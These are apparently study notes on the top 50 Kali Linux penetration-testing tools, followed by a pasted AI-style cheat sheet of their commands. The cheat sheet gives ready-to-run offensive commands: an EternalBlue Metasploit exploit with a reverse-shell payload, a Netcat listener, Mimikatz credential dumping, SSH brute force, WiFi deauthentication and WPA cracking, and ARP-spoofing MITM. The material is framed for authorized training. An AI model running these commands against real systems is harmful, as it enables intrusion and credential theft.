πŸ› οΈ

Kali Linux Tools Overview - top 50 tools

Jul 14, 2025

Overview

This lecture presents a concise guide to the top 50 Kali Linux tools essential for security professionals, covering their core functionalities, use cases, and best practices for ethical penetration testing.

Organization of Kali Linux Tools

  • Kali Linux includes over 600 security tools grouped by assessment phase: information gathering, vulnerability analysis, exploitation, forensics, password attacks, reverse engineering, and reporting.
  • Proper tool selection supports each phase of a professional penetration test, from reconnaissance to post-exploitation.

Essential Network Analysis & Scanning Tools

  • Nmap: Versatile tool for network discovery, port scanning, version detection, and firewall evasion.
  • Masscan: Extremely fast Internet-scale port scanner.
  • Netcat (nc): Multi-purpose network utility for port scanning, file transfer, and backdoor setup.
  • Wireshark: Powerful packet sniffer for deep network protocol analysis.
  • Hping3: Advanced packet crafting and firewall-testing tool.

Web Application Security Tools

  • Burp Suite: Industry-standard for web vulnerability scanning, proxying, and manual testing.
  • OWASP ZAP: Open-source, automated web application security scanner.
  • SQLMap: Automated SQL injection and database takeover tool.
  • Nikto: Comprehensive web server vulnerability scanner.
  • Dirb/Dirbuster: Brute-force tools for discovering hidden web directories and files.

Wireless Security Tools

  • Aircrack-ng: Suite for Wi-Fi monitoring, deauthentication, and key/crack attacks.
  • Reaver/Bully: Tools for brute-forcing WPS PINs.
  • Wifite: Automates WEP/WPA/WPS wireless attacks.

Exploitation Frameworks & Social Engineering

  • Metasploit: Advanced exploitation, payload generation, and post-exploitation platform.
  • BeEF: Browser-based exploitation framework.
  • SET: Social engineering attacks automation tool.

Password Cracking & Analysis

  • John the Ripper: CPU-based password cracker with rules and session support.
  • Hashcat: GPU-accelerated password recovery tool.
  • Hydra/Medusa: High-speed network login brute-forcers for various protocols.

Vulnerability Assessment Tools

  • OpenVAS: Full-featured vulnerability scanner.
  • Lynis: Security auditing for Unix/Linux.
  • Wapiti: Web application vulnerability scanner.

Forensics & Information Gathering

  • Maltego, Recon-ng, theHarvester, Dmitry: OSINT, data mining, subdomain and email enumeration.
  • Autopsy/Sleuth Kit: Digital forensic analysis tools.

Reverse Engineering

  • Ghidra, Radare2, GDB (PEDA/GEF/pwndbg): Disassembly, debugging, and binary analysis frameworks.

Exploit Development & Automation

  • MSFVenom: Payload generator/encoder.
  • Searchsploit: Local exploit-db searcher.
  • Pattern Create/Offset: Aids buffer overflow exploit development.

Network Spoofing & MITM

  • Ettercap, Bettercap, Responder: Tools for man-in-the-middle network attacks and credential capture.

Mobile Security Tools

  • ADB, MobSF, Frida: Android device management, mobile app analysis, and dynamic instrumentation.

Cryptography & Steganography

  • Hashidentifier, Steghide, Binwalk: Hash identification, steganography, and firmware analysis.

Post-Exploitation

  • Mimikatz, PowerSploit, Evil-WinRM: Credential extraction, privilege escalation, and remote shell on Windows.

Reporting & Documentation

  • Dradis, Faraday, CherryTree, Pipal: Reporting, collaboration, note-keeping, and password analysis utilities.

Advanced Automation & Integration

  • Combining multiple tools and scripting maximizes assessment coverage and efficiency.
  • Custom tool development with Python or bash supports specialized tasks.

Best Practices & Ethical Use

  • Always obtain written authorization and define the scope before testing.
  • Document activities, protect confidentiality, and avoid system disruption.
  • Choose tools based on the assessment phase and specific needs.

Frequently Asked Questions (Summary)

  • Beginners should start with Nmap, Wireshark, Netcat, Burp Suite, ZAP, Nikto, theHarvester, and John the Ripper.
  • Practice in legal lab environments, using VMs, online platforms, or isolated home labs.
  • Tool selection and usage depends on the assessment phase and specific target characteristics.
  • Avoid scanning without permission, over-aggressive scans, poor documentation, neglecting scope, and relying only on tools.

Key Terms & Definitions

  • Penetration Testing β€” Authorized simulation of attacks to find security weaknesses.
  • Reconnaissance (Recon) β€” Information gathering phase before attacking.
  • Exploit β€” Software or commands that take advantage of vulnerabilities.
  • Man-in-the-Middle (MITM) β€” Attack intercepting communications between parties.
  • OSINT β€” Open-source intelligence; gathering public data for recon.

Action Items / Next Steps

  • Practice foundational tools (Nmap, Wireshark, Burp Suite, theHarvester) in a legal lab.
  • Set up virtual labs with Kali and vulnerable targets (e.g., DVWA, Metasploitable).
  • Review ethical guidelines before performing any assessments.
  • Continue exploring advanced features and integrations for core tools.

Absolutely! Here’s a curated list of the most important commands that ethical hackers should know, organized by common phases of penetration testing and using essential Kali Linux tools:

Reconnaissance & Information Gathering

Nmap

  • nmap -sS -p- 192.168.1.100 β€” TCP SYN scan all ports
  • nmap -sV -sC -O 192.168.1.100 β€” Service/version detection, default scripts, OS detection
  • nmap --script vuln 192.168.1.100 β€” Run vulnerability scripts

theHarvester

  • theHarvester -d target.com -b all -l 500 β€” Collect emails, subdomains, hosts

Recon-ng

  • workspaces create target
  • modules load recon/domains-hosts/google_site_web
  • options set SOURCE target.com
  • run

Scanning & Enumeration

Masscan

  • masscan -p1-65535 192.168.1.0/24 --rate=1000 β€” Fast port scan

Netcat

  • nc -nlvp 4444 β€” Listen on port 4444 (reverse shell listener)
  • nc -zvn 192.168.1.100 1-1000 β€” Scan ports 1-1000

Nikto

  • nikto -h http://target.com β€” Web server vulnerability scan

Dirb

  • dirb http://target.com /usr/share/wordlists/dirb/common.txt β€” Directory brute force

Exploitation

Metasploit Framework

  • msfconsole β€” Start Metasploit console
  • search smb β€” Search for SMB exploits
  • use exploit/windows/smb/ms17_010_eternalblue β€” Select exploit
  • set RHOSTS 192.168.1.100 β€” Set target IP
  • set PAYLOAD windows/x64/meterpreter/reverse_tcp β€” Set payload
  • exploit β€” Launch exploit

SQLMap

  • sqlmap -u "http://target.com/page?id=1" --batch --dbs β€” Detect SQL injection and enumerate databases

Hydra

  • hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 β€” SSH password brute force

Post-Exploitation

Mimikatz

  • privilege::debug
  • sekurlsa::logonPasswords β€” Dump Windows credentials

PowerSploit (PowerShell)

  • Invoke-Mimikatz -DumpCreds β€” Dump credentials
  • Invoke-AllChecks β€” Privilege escalation checks

Evil-WinRM

  • evil-winrm -i 192.168.1.100 -u Administrator -p password β€” Connect to Windows remote shell

Wireless Attacks

Aircrack-ng Suite

  • airmon-ng start wlan0 β€” Enable monitor mode
  • airodump-ng wlan0mon β€” Capture wireless packets
  • aireplay-ng -0 10 -a <BSSID> wlan0mon β€” Deauthentication attack
  • aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture.cap β€” Crack WPA/WPA2

Reaver

  • reaver -i wlan0mon -b <BSSID> -vv β€” WPS PIN brute force

Network Sniffing & MITM

Wireshark / Tshark

  • wireshark β€” Start GUI packet capture
  • tshark -i eth0 -Y "http.request.method == POST" β€” Filter HTTP POST requests

Ettercap

  • ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100// β€” ARP spoofing MITM

Bettercap

  • bettercap (interactive)
  • net.probe on β€” Network discovery
  • set arp.spoof.targets 192.168.1.100
  • arp.spoof on β€” ARP spoofing

Password Cracking

John the Ripper

  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt β€” Crack passwords with wordlist
  • john --show hashes.txt β€” Show cracked passwords

Hashcat

  • hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt β€” Dictionary attack
  • hashcat -m 0 -a 3 hashes.txt ?l?l?l?l?l?l?l?l β€” Brute force mask attack

Reporting & Documentation

Dradis

  • service dradis start β€” Start Dradis server
  • Access via browser: http://localhost:3000

CherryTree

  • cherrytree β€” Start note-taking GUI

General Tips for Ethical Hackers

  • Always obtain written authorization before testing.
  • Use verbose and logging options to document your work.
  • Start with passive reconnaissance before active scanning.
  • Use timing options (e.g., -T3 in Nmap) to avoid detection or service disruption.
  • Clean up after testing (remove backdoors, shells, accounts).

If you want, I can help you create a personalized cheat sheet with these commands formatted for quick reference! Would you like that?

View note sourcehttps://medium.com/@okanyildiz1994/top-50-kali-linux-tools-comprehensive-guide-for-security-professionals-7bc8752d55b7